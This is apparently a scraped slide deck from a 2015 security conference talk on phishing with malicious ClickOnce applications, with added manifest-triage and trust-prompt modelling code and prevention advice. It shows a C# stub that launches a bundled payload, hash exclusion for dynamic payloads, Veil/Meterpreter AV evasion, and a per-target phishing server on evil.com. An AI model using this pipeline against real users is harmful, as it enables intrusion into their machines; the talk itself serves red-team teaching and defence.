Celebrating a decade
of guiding security
professionals.
@Secure360 or #Sec360 www.Secure360.org
All You Need Is One - A ClickOnce
Love Story
Ryan Gandrud
Cody Wass
Introduction
• Ryan Gandrud
– Penetration tester
– Computer enthusiast
• Cody Wass
– Web applications
– Scotch aficionado
Overview
• ClickOnce?
• Phishing-phriendly pheatures
• Creating a malicious ClickOnce application
• Phishing setup
• Issues and pitfalls
• Demo
• Prevention
ClickOnce WTF?
• ClickOnce – What is it?
– A .NET deployment technology: a set of manifests wrapped around a
Windows executable that “installs” it into a per-user cache when the
user clicks a link
– Used by application administrators to deploy applications to users
on the network
– Supports multiple deployment methods (web, network share, local
execution)
ClickOnce Internals
• ProjectName.application
– The deployment manifest: contains the location of the application
manifest and the application version information
• ProjectName.exe.config.deploy
– Contains application settings (e.g. connection strings)
• ProjectName.exe.deploy
– The (potentially malicious) executable that will be run by the user
– The .deploy suffix is appended by the publisher so web servers hand
the file out instead of blocking or executing an .exe; ClickOnce strips
it again when the package is copied into the local cache
• ProjectName.exe.manifest
– The application manifest: contains the application version, the .NET
versions supported, the permission level requested, and hashes and
signatures for the other files
– Names the executable that is the entry point
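Everything listed above can be pulled out of the two manifests with a little XML parsing. The following Python is an added example for this page, not the presenters' tooling: it parses a constructed .application and .exe.manifest pair modelled on what Visual Studio's Publish wizard emits, reports identity and version, deployment provider, requested permission level, signature presence and per-file hashes, and flags the combination the rest of the talk relies on (unsigned, online-only, Full Trust, one file with its hash excluded). The manifests, the evil.com URL, the digest values and the file names are all constructed for the example.

```python
"""Static triage of ClickOnce manifests (.application / .exe.manifest).
Added example for this page, not the presenters' tooling.  It extracts the
fields listed on the 'ClickOnce Internals' slide and flags the combination
the talk relies on.  Both manifests are constructed to mirror what Visual
Studio's Publish wizard emits; they were not captured from the demo.
"""
import xml.etree.ElementTree as ET

A1 = 'xmlns="urn:schemas-microsoft-com:asm.v1"'  # identity elements live in asm.v1
HEAD = ('<asmv1:assembly manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" '
        'xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">')

# Constructed deployment manifest: online-only, .deploy suffixes on, no <Signature> block.
DEPLOYMENT_MANIFEST = HEAD + f"""
  <assemblyIdentity name="Evil Survey.application" version="1.0.0.0" {A1} />
  <deployment install="false" mapFileExtensions="true">
    <deploymentProvider codebase="http://evil.com/a1b2/Evil Survey.application" />
  </deployment>
  <dependency>
    <dependentAssembly dependencyType="install"
        codebase="Application Files\\Evil Survey_1_0_0_0\\Evil Survey.exe.manifest">
      <assemblyIdentity name="Evil Survey.exe" version="1.0.0.0" {A1} />
      <hash><dsig:DigestValue>Y29uc3RydWN0ZWQ=</dsig:DigestValue></hash>
    </dependentAssembly>
  </dependency>
</asmv1:assembly>"""

# Constructed application manifest: asks for Full Trust; ClickOnceInc.exe is listed with its hash excluded.
APPLICATION_MANIFEST = HEAD + f"""
  <assemblyIdentity name="Evil Survey.exe" version="1.0.0.0" {A1} />
  <entryPoint>
    <assemblyIdentity name="Evil Survey" version="1.0.0.0" {A1} />
    <commandLine file="Evil Survey.exe" parameters="" />
  </entryPoint>
  <trustInfo><security><applicationRequestMinimum>
    <PermissionSet Unrestricted="true" ID="Custom" SameSite="site" />
    <defaultAssemblyRequest permissionSetReference="Custom" />
  </applicationRequestMinimum></security></trustInfo>
  <dependency>
    <dependentAssembly dependencyType="install" codebase="Evil Survey.exe" size="8192">
      <assemblyIdentity name="Evil Survey" version="1.0.0.0" {A1} />
      <hash><dsig:DigestValue>Y29uc3RydWN0ZWQ=</dsig:DigestValue></hash>
    </dependentAssembly>
  </dependency>
  <file name="ClickOnceInc.exe" size="73802" />
</asmv1:assembly>"""


def _local(tag):
    """Drop the namespace: ClickOnce mixes asm.v1, asm.v2 and xmldsig in one file."""
    return tag.rsplit('}', 1)[-1]

def _first(elem, name):
    return next((e for e in elem.iter() if _local(e.tag) == name), None)

def _all(elem, name):
    return [e for e in elem.iter() if _local(e.tag) == name]

def parse_deployment_manifest(text):
    """Summarise the *.application file the phishing link points at."""
    root = ET.fromstring(text)
    ident, dep, prov = (_first(root, n) for n in ('assemblyIdentity', 'deployment', 'deploymentProvider'))
    return {
        'name': ident.get('name'), 'version': ident.get('version'),
        'online_only': dep is not None and dep.get('install') == 'false',  # "available online only"
        'provider': prov.get('codebase') if prov is not None else None,
        'app_manifests': [d.get('codebase') for d in _all(root, 'dependentAssembly')],
        'signed': _first(root, 'Signature') is not None,  # XML-DSig / Authenticode block present?
    }

def parse_application_manifest(text):
    """Summarise the *.exe.manifest that names the payload and the permissions it wants."""
    root = ET.fromstring(text)
    ident, cmd, pset = (_first(root, n) for n in ('assemblyIdentity', 'commandLine', 'PermissionSet'))
    files = [{'name': f.get('codebase') or f.get('name'), 'hashed': _first(f, 'DigestValue') is not None}
             for f in _all(root, 'dependentAssembly') + _all(root, 'file')]
    return {
        'name': ident.get('name'), 'version': ident.get('version'),
        'entry_point': cmd.get('file') if cmd is not None else None,
        'full_trust': pset is not None and pset.get('Unrestricted') == 'true',
        'files': files,
        'signed': _first(root, 'Signature') is not None,
    }

def triage(deploy, app):
    """Findings a responder wants before anyone clicks; an empty list means nothing notable."""
    out = []
    if not (deploy['signed'] and app['signed']):
        out.append('manifests are unsigned: the trust prompt will show "Unknown Publisher"')
    if app['full_trust']:
        out.append('requests Full Trust: user is asked to elevate, payload then runs with full user rights')
    if deploy['online_only']:
        out.append('online-only deployment: no Start Menu entry, runs from the per-user app cache')
    out += ['%s has no hash in the manifest: its bytes can differ on every download' % f['name']
            for f in app['files'] if not f['hashed']]
    if deploy['provider']:
        out.append('deployment provider: ' + deploy['provider'])
    return out
```

Matching on local element names rather than full namespaces keeps the parser working whether the file was produced by Visual Studio or by mage.exe, which differ in prefix usage. A real signed manifest carries a `<Signature>` element at the end; its absence is the single cheapest indicator to check, because it is also what makes the trust prompt say "Unknown Publisher".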
ClickOnce Certificate Signing
• ClickOnce and .NET support signing applications
• Authenticode – Microsoft’s certificate-based code-signing technology,
used to verify the authenticity of the publisher
• A CA-issued signature requires “acquiring” a code-signing Authenticode
certificate from a Certificate Authority (CA)
• Signing options available
– Signed (CA-issued certificate)
– Self-signed (MakeCert.exe, shipped with the Windows SDK / Visual Studio)
– Unsigned (no certificate used)
ClickOnce Trust Architecture
• Whether and how an application is executed is decided by a trust
architecture separated into execution-source zones (the Internet
Explorer security zones)
• ClickOnce allows applications to elevate their permissions either
automatically, when policy already grants what they ask for, or by
prompting the user
• Prompting levels are controlled by the following registry key
– HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel
ClickOnce Trust Architecture (cont.)
• These are features: “But the most important new feature
when it comes to security is … the end user can elevate
permissions without the help of an administrator”
• “If the application permissions don't exceed policy
permissions, the application downloads and runs without
asking the user any trust questions.”
• “If the application needs more permissions than what's
granted by policy, the user is asked if he wants to trust that
application and elevate permissions... If the user clicks Run,
the application is put into the Application Trust List and is
downloaded and started.”
MSDN:https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
ClickOnce Trust Architecture (cont.)
• When ClickOnce was originally being developed in .NET 2.0
Beta 2, permissions looked promising, with the Internet zone
being restricted to applications signed by a valid certificate.
Zone             Applications
My Computer      Enabled
Local Intranet   Enabled
Trusted Sites    Enabled
Internet         Enabled for signed apps
Untrusted Sites  Disabled
ClickOnce Trust Architecture (cont.)
• Unfortunately, Microsoft changed this before release, specifically
for the Internet zone, and not for the better
• Now, by default, an unsigned ClickOnce package that comes from the
Internet only has to ask: the user is prompted and can grant the
application Full Trust, after which it runs with the full privileges
of the logged-on user (no administrator involved)
Zone             Applications
My Computer      Enabled
Local Intranet   Enabled
Trusted Sites    Enabled
Internet         Enabled
Untrusted Sites  Disabled
Owning With a Click
• Why use a ClickOnce application?
– ClickOnce is supported on all modern Windows operating
systems since it relies on .NET
– All distributions ship with at least .NET 2.0 since Windows
Server 2003
– .NET is backwards compatible
– Dead simple to write
– Public browser exploits are highly version specific and,
more often than not, crash the victim’s browser
Owning With a Click (cont.)
• Originally meant to be deployed through Internet Explorer
– ClickOnce is supported by IE 6.0+
– Now supported in Firefox and Chrome through third-party
add-ons (.NET 3.5+)
• Minimizes user interaction
• Several ways to deliver the malicious code
– It’s a .NET project – write your own
– Include a malicious executable as a resource
Payloads
• Roll your own payload
– Our original vector
– Flagged by AV
• Standard Metasploit payload
– Also attempted
– Reverse_HTTPS returned broken shells
• Assumed to be AV or something inline interfering with delivery of
the second Meterpreter stage
Payloads (cont.)
• PowerShell
– Justin (@sixdub) did a great write-up on using PowerShell
commands instead of an executable for a Meterpreter
callback with ClickOnce
– Pros:
• Powershell command runs in memory – never touches disk
– Cons:
• Difficulty in changing payloads
• ClickOnce is already on disk
http://www.sixdub.net/?p=555
Payloads (cont.)
• Veil
– Pros:
• Payloads written in different languages
• Encrypted Payloads – less likely to get caught by AV
– Cons:
• Static “random” Meterpreter callback
• This is an issue with how Metasploit handles stagers
– Will be fixed (hopefully) soon
• We decided to go with Veil since we wanted to avoid AV detection
during our Red Team engagement
Payloads (cont.)
• Problem:
– Static Meterpreter callbacks from targets
• Solution?:
– Dynamically generating individualized Veil
payloads
Creating a ClickOnce Application
• Visual Studio is used to create ClickOnce
applications
– The free edition of Visual Studio 2013 supports
ClickOnce publishing
• Start a new console application project within
Visual Studio
– No GUI popup during execution
Creating a ClickOnce Application (cont.)
• Using C# in .NET, create a new process that
launches your included executable
(ClickOnceInc.exe)
using System.Diagnostics;

static class Program
{
    static void Main()
    {
        // Start the bundled (malicious) executable as a child process. It ships in the
        // package as ClickOnceInc.exe.deploy and is restored to ClickOnceInc.exe in the
        // application directory before this entry point runs.
        Process p = new Process();
        p.StartInfo.UseShellExecute = false;        // launch directly, no shell lookup
        p.StartInfo.RedirectStandardOutput = false; // nothing to read back from it
        p.StartInfo.FileName = "ClickOnceInc.exe";  // relative to the working directory
        p.Start();
    }
}
Creating a ClickOnce Application (cont.)
• Ensure that your application uses the correct
version of .NET so the application runs
properly.
• Here, .NET 3.5 was chosen by navigating to
the Application tab on the left, and selecting
the Target Framework from the dropdown.
Creating a ClickOnce Application (cont.)
• Include your malicious binary into the project
by clicking and dragging it over your Solution
Explorer
Creating a ClickOnce Application (cont.)
• In the Properties of the application under Publish:
– Ensure the Install Mode is set to “available online only”
• This prevents the application from showing up in the
Start Menu
– Click the Application Files… button and exclude the hash for
ClickOnceInc.exe
• Dynamic payload generation changes the hash, and ClickOnce
refuses to run a file whose hash does not match the manifest
Creating a ClickOnce Application (cont.)
• Click the Publish button and follow the wizard to publish the
ClickOnce application to your local drive
• The output contains several files and directories
– Application Files directory
– Evil Survey.application
– Publish.htm
– Setup.exe
Server Setup
• Web server with ClickOnce-specific directories
– Kali with Veil, Metasploit, and Apache
• Apache mod_rewrite
– GET http://evil.com/?u={ID} is rewritten to
evil.com/{ID}/evil.application, so each target’s link resolves to
its own copy of the package
– Combined with dynamic Veil payloads, this allowed easy analytics
and post-mortem data gathering (which ID clicked, which ID called back)
Callback Listener
• Our solution:
– Metasploit listener
• Phishing scenario – targets are workstations
• Most likely have outbound http access
• Limited window of engagement
• Egress filtering
– ssh / icmp / dns tunneling
Pitfalls
• Outdated packages / dependencies
– Veil, Python, Wine
• Signing restrictions
– No signing possible with dynamic payloads
• No easy way to use mage.exe on Linux
– Self-signed certs are only marginally better than none
Cleanup
• ClickOnce install directory:
– %LOCALAPPDATA%\Apps\2.0\{machine-specific}\{machine-specific}\{obfuscated-app-name}
• C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-folder}
Cleanup
• Add/Remove Programs (only lists installed apps; online-only apps never
appear there)
• Delete the relevant AppData folder
• Nuke everything:
rundll32 dfshim CleanOnlineAppCache
– Note: this clears the entire online application cache.
– No need for elevated privileges; the app cache is per-user.
Demo
• Client:
– Windows 7
• Server (evil.com):
– Kali running Apache to serve file
– Metasploit listener running to catch callback
Preventative Measures
• Typical Anti-Phishing Techniques
– User education
• Users continue through “… a quarter of Google
Chrome’s malware and phishing warnings”
– Endpoint protection
• Signatures lag behind usage
• Heuristics require a practical balance
• Limited usefulness for other phishing-based vectors
– Least privileged configurations
Preventative Measures
• ClickOnce-Specific Techniques
– Code Access Security
• ClickOnce applications specify a requested “permission level” in
the application manifest
• Default for a new project: Full Trust – anything beyond what the
zone’s policy grants requires the elevation prompt
Preventative Measures
• Disabling the Trust Prompt
– HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel
– The trust prompt is controlled per zone
• Untrusted Sites
• Internet
• My Computer
• Local Intranet
• Trusted Sites
Preventative Measures
• Default values (one string value per zone under PromptingLevel)
Zone (value name)  Default
Internet           Enabled
UntrustedSites     Disabled
MyComputer         Enabled
LocalIntranet      Enabled
TrustedSites       Enabled
• Possible values for each zone
Option                     Registry value
Enable the trust prompt.   Enabled
Restrict the trust prompt. AuthenticodeRequired
Disable the trust prompt.  Disabled
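The decision the two tables encode, as an added example in Python (not the deck's code and not Microsoft's): it applies the MSDN rule quoted on the trust-architecture slides (no trust questions when policy already covers the request; otherwise the zone's PromptingLevel decides) to the default values above, shows what happens to the talk's unsigned Full Trust package from each zone, and contrasts that with a hardened Internet=AuthenticodeRequired setting, emitting the reg.exe lines that apply it. Reading AuthenticodeRequired as "prompt only when signed by a known CA, otherwise refuse" and Disabled as "refuse" is my interpretation of the table; the HKLM path is the deck's registry key, the outcome names are mine.

```python
"""Model of the ClickOnce trust-manager decision these slides describe.
Added example, not from the deck or from Microsoft.  It encodes the MSDN
rule quoted earlier (no trust questions when policy already covers the
request, otherwise the zone's PromptingLevel decides) over the default
registry values in the table above, and contrasts them with a hardened
set.  Treating AuthenticodeRequired as "prompt only for a known-CA
signature, block everything else" and Disabled as "block" is my reading
of the table; check it against the MSDN page the deck cites.
"""
KEY = r'HKLM\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel'

# Defaults from the slide: every zone except UntrustedSites may prompt the user.
DEFAULT_LEVELS = {'MyComputer': 'Enabled', 'LocalIntranet': 'Enabled', 'TrustedSites': 'Enabled',
                  'Internet': 'Enabled', 'UntrustedSites': 'Disabled'}
# Hardened: Internet needs a trusted Authenticode signer before a prompt is even offered.
HARDENED_LEVELS = dict(DEFAULT_LEVELS, Internet='AuthenticodeRequired')


def trust_decision(zone, levels, needs_elevation, signed_by_known_ca):
    """Return 'run', 'prompt' or 'blocked' for an app launched from `zone` under `levels`."""
    if not needs_elevation:
        return 'run'                      # policy already grants what the app asks for
    level = levels.get(zone, 'Disabled')  # unknown zone: fail closed (assumption, not MSDN)
    if level == 'Disabled':
        return 'blocked'
    if level == 'AuthenticodeRequired' and not signed_by_known_ca:
        return 'blocked'
    return 'prompt'                       # Enabled, or AuthenticodeRequired with a known signer


def unsigned_full_trust_outcomes(levels):
    """The deck's scenario, an unsigned app requesting Full Trust, evaluated from every zone."""
    return {zone: trust_decision(zone, levels, True, False) for zone in levels}


def registry_commands(levels):
    """reg.exe lines that apply `levels`; run them from an elevated prompt on the endpoint."""
    return ['reg add "%s" /v %s /t REG_SZ /d %s /f' % (KEY, zone, value)
            for zone, value in sorted(levels.items())]


if __name__ == '__main__':
    for name, levels in (('default', DEFAULT_LEVELS), ('hardened', HARDENED_LEVELS)):
        print(name, unsigned_full_trust_outcomes(levels))
    print('\n'.join(registry_commands(HARDENED_LEVELS)))
```

With the defaults the Internet zone answers "prompt", which is the whole attack: one click on Run and the package is trusted. With AuthenticodeRequired the same unsigned package is refused before any dialog appears. Note what this does not do: an attacker who has "acquired" a CA-issued code-signing certificate, as the signing slide puts it, still gets the prompt, so the registry setting raises the cost of the phish rather than eliminating it.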
Preventative Measures
• Windows 8
– SmartScreen Filter
• Enabled by default
• Adds another layer after the user clicks ‘Run’ for anything
not signed by a recognized CA
• The default ‘OK’ action results in the application not running
Flowchart by Robin Shahan (@robindotnet)
Questions?
More Information / References
• Devdatta Akhawe (University of California, Berkeley) and Adrienne Porter Felt (Google, Inc.): Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness
• http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/
• https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
• https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx
• https://msdn.microsoft.com/en-us/library/ee308453.aspx
• https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive-answer-2/
• https://blog.netspi.com/bypassing-av-with-veil-evasion/
• https://github.com/rapid7/metasploit-framework/issues/4895
• http://www.sixdub.net/?p=555
• https://blog.netspi.com/
SCS DevSecOps Seminar - State of DevSecOps
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...
 
Hardware Security on Vehicles
Hardware Security on VehiclesHardware Security on Vehicles
Hardware Security on Vehicles
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021
 
The End of Security as We Know It - Shannon Lietz
The End of Security as We Know It - Shannon LietzThe End of Security as We Know It - Shannon Lietz
The End of Security as We Know It - Shannon Lietz
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source Software
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
 
Andrew Useckas Csa presentation hacking custom webapps 4 3
Andrew Useckas Csa presentation   hacking custom webapps 4 3Andrew Useckas Csa presentation   hacking custom webapps 4 3
Andrew Useckas Csa presentation hacking custom webapps 4 3
 
AusCERT - Developing Secure iOS Applications
AusCERT - Developing Secure iOS ApplicationsAusCERT - Developing Secure iOS Applications
AusCERT - Developing Secure iOS Applications
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 

Recently uploaded

Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
Mydbops
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
operationspcvita
 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Fwdays
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
Neo4j
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
DanBrown980551
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
christinelarrosa
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
UiPathCommunity
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
akankshawande
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Pitangent Analytics & Technology Solutions Pvt. Ltd
 

Recently uploaded (20)

Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
 

All You Need is One - A ClickOnce Love Story - Secure360 2015

1. Celebrating a decade of guiding security professionals. @Secure360 or #Sec360 www.Secure360.org
All You Need Is One - A ClickOnce Love Story
Ryan Gandrud
Cody Wass
2. Introduction
• Ryan Gandrud
– Penetration tester
– Computer enthusiast
• Cody Wass
– Web applications
– Scotch aficionado

3. Overview
• ClickOnce?
• Phishing-phriendly pheatures
• Creating a malicious ClickOnce application
• Phishing setup
• Issues and pitfalls
• Demo
• Prevention

4. ClickOnce WTF?
• ClickOnce – What is it?
– ClickOnce is a wrapper that sits around a Windows executable to “install” it on a machine
– Used by application administrators to deploy installations to users in the network
– Supports multiple deployment methods (web, network share, local execution)

5. ClickOnce Internals
• ProjectName.application
– Contains the location of the manifest and application version information
• ProjectName.exe.config.deploy
– Contains application settings (e.g. connection strings)
• ProjectName.exe.deploy
– The (potentially malicious) executable that will be run by a user
• ProjectName.exe.manifest
– Manifest file containing application version, .NET versions supported, permission level requested, and signatures for the other files
– Contains the file name for the executable

6. ClickOnce Certificate Signing
• ClickOnce and .NET support signing applications
• Authenticode – Microsoft cert-based signing technology used to verify the authenticity of the publisher
• Need to “acquire” a code-signing Authenticode certificate from a Certificate Authority (CA)
• Signing stages available
– Signed (CA)
– Self-signed (MakeCert.exe in .NET)
– Unsigned (no cert used)
7. ClickOnce Trust Architecture
• Applications and how they are executed are based on a trust architecture separated into different execution source zones
• ClickOnce allows permitted applications to elevate privileges automatically (Trusted Sites) or through prompting the user
• Prompting levels are controlled by the following registry key
– HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel

8. ClickOnce Trust Architecture (cont.)
• These are features: “But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator”
• “If the application permissions don't exceed policy permissions, the application downloads and runs without asking the user any trust questions.”
• “If the application needs more permissions than what's granted by policy, the user is asked if he wants to trust that application and elevate permissions... If the user clicks Run, the application is put into the Application Trust List and is downloaded and started.”
